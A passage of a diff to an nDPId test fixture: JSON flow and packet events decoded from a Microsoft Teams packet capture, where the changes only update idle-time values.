+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697061,"flow_last_seen":1587041697061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041697061,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1587041697061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041697061,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGxpHAqAEGKE+KKeyYAbtVmTcwAAAAALAC\/\/8wcwAAAgQFtAEDAwUBAQgKMITmwQAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1587041697091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041697091,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8X+VAAG4GOLAoT4opwKgBBgG77Jhhqm+9VZk3MaASIADeAQAAAgQFoAEDAwgEAggKC\/ZmGDCE5sE="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1587041697091,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041697091,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxp3AqAEGKE+KKeyYAbtVmTcxYapvvoAQEAkclQAAAQEICjCE5t4L9mYY"} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041697061,"flow_last_seen":1587041697092,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041697092,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gate.hockeyapp.net","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041697412} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2753,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041697244,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2761,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041697611} @@ -506,60 +506,60 @@ 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1587041697660,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1587041697660,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA40fgAADUBJWpdR27NwKgBBgMDcCsAAAAARQAASh2AAAAyEd1gwKgBBl1Hbs3DdD\/NADaJWQ=="} 00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2767,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041697660,"flow_last_seen":1587041697660,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041697660,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.321296} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2774,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1587041697673,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1587041697673,"pkt":"KDc3AG3IEBMx8Tl2CABFoAA4akMAADUBjR9dR27NwKgBBgMDcBsAAAAARQAAWp4wAAAyEVygwKgBBl1Hbs3DdD\/NAEaJWQ=="} -00938{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041693828,"flow_last_seen":1587041694047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6930,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00824{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693582,"flow_last_seen":1587041694243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00938{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041693828,"flow_last_seen":1587041694047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6930,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00824{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693582,"flow_last_seen":1587041694243,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":220,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041697660,"flow_last_seen":1587041697673,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00937{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1587041693849,"flow_last_seen":1587041697765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7358,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1587041676435,"flow_last_seen":1587041676536,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12621,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1300,"flow_first_seen":1587041677243,"flow_last_seen":1587041697130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":750126,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041682144,"flow_last_seen":1587041685098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9034,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1587041685240,"flow_last_seen":1587041685471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":30424,"flow_avg_l4_payload_len":585,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685984,"flow_last_seen":1587041686156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8124,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00937{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1587041693849,"flow_last_seen":1587041697765,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7358,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1587041676435,"flow_last_seen":1587041676536,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12621,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1300,"flow_first_seen":1587041677243,"flow_last_seen":1587041697130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":750126,"flow_avg_l4_payload_len":577,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041682144,"flow_last_seen":1587041685098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9034,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1587041685240,"flow_last_seen":1587041685471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":30424,"flow_avg_l4_payload_len":585,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685984,"flow_last_seen":1587041686156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8124,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1587041687745,"flow_last_seen":1587041687963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9450,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1587041687745,"flow_last_seen":1587041687963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9450,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1587041676362,"flow_last_seen":1587041677077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":60045,"flow_avg_l4_payload_len":779,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1587041677042,"flow_last_seen":1587041677375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":20082,"flow_avg_l4_payload_len":590,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 